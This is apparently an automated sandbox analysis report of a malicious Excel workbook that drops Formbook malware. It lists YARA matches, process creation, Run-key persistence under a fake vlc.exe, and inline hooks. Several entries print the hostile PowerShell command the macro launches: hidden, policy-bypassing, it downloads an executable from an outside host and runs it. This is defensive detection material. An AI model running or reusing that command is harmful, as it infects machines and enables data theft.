Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_013F1FF1 30_2_013F1FF1
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_013FDFCE 30_2_013FDFCE
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_01346E30 30_2_01346E30
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_013ED616 30_2_013ED616
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_013F2EF7 30_2_013F2EF7
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: 5901777.xls OLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
Document contains embedded VBA macros
Source: 5901777.xls OLE indicator, VBA macros: true
Found potential string decryption / allocating functions
Source: C:\Users\Public\oftmhayq.exe Code function: String function: 0041BBE0 appears 38 times
Source: C:\Users\Public\oftmhayq.exe Code function: String function: 0132D08C appears 48 times
Source: C:\Users\Public\oftmhayq.exe Code function: String function: 012DB150 appears 159 times
Source: C:\Users\Public\oftmhayq.exe Code function: String function: 01365720 appears 85 times
Source: C:\Users\Public\oftmhayq.exe Code function: String function: 0132B150 appears 133 times
PE file contains strange resources
Source: oftmhayq.exe.20.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: oftmhayq.exe.20.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: oftmhayq.exe.20.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vlc.exe.25.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vlc.exe.25.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vlc.exe.25.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Yara signature match
Source: 5901777.xls, type: SAMPLE Matched rule: PowerShell_in_Word_Doc date = 2017-06-27, author = Florian Roth, description = Detects a powershell and bypass keyword in a Word document, reference = Internal Research - ME, license = https://creativecommons.org/licenses/by-nc/4.0/, score = 4fd4a7b5ef5443e939015276fc4bf8ffa6cf682dd95845ef10fdf8158fdd8905
Source: 0000001E.00000002.483476185.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001E.00000002.483476185.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001E.00000002.484446432.0000000000FA0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001E.00000002.484446432.0000000000FA0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000018.00000002.469007949.0000000003B41000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000018.00000002.469007949.0000000003B41000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000019.00000002.468368028.00000000043B1000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000019.00000002.468368028.00000000043B1000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001D.00000002.534769301.0000000001170000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001D.00000002.534769301.0000000001170000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000020.00000002.491474421.00000000033E1000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000020.00000002.491474421.00000000033E1000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 30.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 30.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 29.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 29.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 30.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 30.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 29.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 29.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: oftmhayq.exe.20.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: vlc.exe.25.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.troj.evad.winXLS@16/12@2/1
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5268:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5280:120:WilError_01
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\{3E27D0C2-EB48-412A-8CE4-AD42CAD017F3} - OProcSessId.dat Jump to behavior
Source: 5901777.xls OLE indicator, Workbook stream: true
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: 5901777.xls Virustotal: Detection: 23%
Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ' & { iwr http://sparepartiran.com/js/2Q/5901777.pdf.exe -OutFile C:\Users\Public\oftmhayq.exe}; & {Start-Process -FilePath 'C:\Users\Public\oftmhayq.exe'}'
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ' & { iwr http://sparepartiran.com/js/2Q/5901777.pdf.exe -OutFile C:\Users\Public\oftmhayq.exe}; & {Start-Process -FilePath 'C:\Users\Public\oftmhayq.exe'}'
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\Public\oftmhayq.exe 'C:\Users\Public\oftmhayq.exe'
Source: unknown Process created: C:\Users\Public\oftmhayq.exe 'C:\Users\Public\oftmhayq.exe'
Source: unknown Process created: C:\Users\Public\oftmhayq.exe C:\Users\Public\oftmhayq.exe
Source: unknown Process created: C:\Users\Public\oftmhayq.exe C:\Users\Public\oftmhayq.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe'
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\Public\oftmhayq.exe 'C:\Users\Public\oftmhayq.exe' Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\Public\oftmhayq.exe 'C:\Users\Public\oftmhayq.exe' Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Process created: C:\Users\Public\oftmhayq.exe C:\Users\Public\oftmhayq.exe Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Process created: C:\Users\Public\oftmhayq.exe C:\Users\Public\oftmhayq.exe Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll Jump to behavior
Source: Binary string: wntdll.pdbUGP source: oftmhayq.exe, 0000001D.00000002.535167655.00000000013CF000.00000040.00000001.sdmp, oftmhayq.exe, 0000001E.00000002.487705412.000000000141F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: oftmhayq.exe

Data Obfuscation:

barindex
Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ' & { iwr http://sparepartiran.com/js/2Q/5901777.pdf.exe -OutFile C:\Users\Public\oftmhayq.exe}; & {Start-Process -FilePath 'C:\Users\Public\oftmhayq.exe'}'
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ' & { iwr http://sparepartiran.com/js/2Q/5901777.pdf.exe -OutFile C:\Users\Public\oftmhayq.exe}; & {Start-Process -FilePath 'C:\Users\Public\oftmhayq.exe'}'
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\oftmhayq.exe Code function: 24_2_0730EB90 pushad ; ret 24_2_0730EBAA
Source: C:\Users\Public\oftmhayq.exe Code function: 24_2_0730219F push E9000001h; ret 24_2_073021A4
Source: C:\Users\Public\oftmhayq.exe Code function: 25_2_07BE219F push E9000001h; ret 25_2_07BE21A4
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_004178AD push 00000001h; retf 29_2_0041796C
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_004172D7 push edi; retf 29_2_004172DA
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_00419D5A push ebp; iretd 29_2_00419D5E
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0040D695 push esp; ret 29_2_0040D699
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0041CEB5 push eax; ret 29_2_0041CF08
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0041CF6C push eax; ret 29_2_0041CF72
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0041CF02 push eax; ret 29_2_0041CF08
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0041CF0B push eax; ret 29_2_0041CF72
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0132D0D1 push ecx; ret 29_2_0132D0E4
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_004178AD push 00000001h; retf 30_2_0041796C
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_004172D7 push edi; retf 30_2_004172DA
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_00419D5A push ebp; iretd 30_2_00419D5E
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_0040D695 push esp; ret 30_2_0040D699
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_0041CEB5 push eax; ret 30_2_0041CF08
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_0041CF6C push eax; ret 30_2_0041CF72
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_0041CF02 push eax; ret 30_2_0041CF08
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_0041CF0B push eax; ret 30_2_0041CF72
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_0137D0D1 push ecx; ret 30_2_0137D0E4
Source: initial sample Static PE information: section name: .text entropy: 7.97600028112
Source: initial sample Static PE information: section name: .text entropy: 7.97600028112

Persistence and Installation Behavior:

barindex
Creates processes via WMI
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Drops PE files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\oftmhayq.exe Jump to dropped file
Source: C:\Users\Public\oftmhayq.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe Jump to dropped file
Drops PE files to the user directory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\oftmhayq.exe Jump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\oftmhayq.exe Jump to dropped file
Stores files to the Windows start menu directory
Source: C:\Users\Public\oftmhayq.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN Jump to behavior
Source: C:\Users\Public\oftmhayq.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run vlc Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run vlc Jump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x81 0x1E 0xE0
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\splwow64.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\splwow64.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\splwow64.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\splwow64.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\splwow64.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\splwow64.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\splwow64.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\splwow64.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\splwow64.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\splwow64.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\splwow64.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\splwow64.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\splwow64.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\splwow64.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
